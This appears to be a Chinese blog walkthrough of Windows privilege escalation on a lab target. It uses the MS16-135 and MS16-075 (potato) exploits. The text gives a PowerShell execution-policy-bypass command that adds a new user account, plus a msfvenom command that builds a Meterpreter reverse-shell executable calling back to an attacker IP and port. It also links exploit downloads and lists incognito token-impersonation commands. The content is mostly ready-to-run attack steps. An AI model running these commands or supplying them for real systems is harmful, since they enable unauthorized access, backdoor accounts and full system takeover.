ms16-135提权利用

利用windows-exploit-suggester.py脚本,查找系统未打补丁有哪些,脚本下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

ms16-135提权利用

利用ms16-135内核漏洞提权,
powershell -nop -exec bypass -c "& {Import-Module 'C:\Users
\123\Desktop\MS16-135.ps1';Invoke-MS16-135 -Application cmd.exe -commandline '/c  net user HELPS [email protected]#45 /add'}",执行完成后可成功添加账户

ms16-135提权利用

利用ms16-075提权

  1. 生成msf生成反弹木马

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.153.130  LPORT=4433 -f exe -o 4433.exe

  1. 将反弹木马上传到靶机,执行后,msf反弹会shell,可见当前用户权限为iis

ms16-135提权利用

  1. 上传potato.exe到靶机

potato.exe下载地址:

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

dir可看到potato.exe已在靶机目录中

ms16-135提权利用

  1. 执行potato.exe

list_tokens –g   列出目标主机用户组的可用令牌

 

ms16-135提权利用

use incognito  加载incognito功能

list_tokens –u  列出目标主机用户的可用令牌

execute -cH -f potato.exe

成功提权,结果如下

 

ms16-135提权利用

相关文章:

猜你喜欢
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode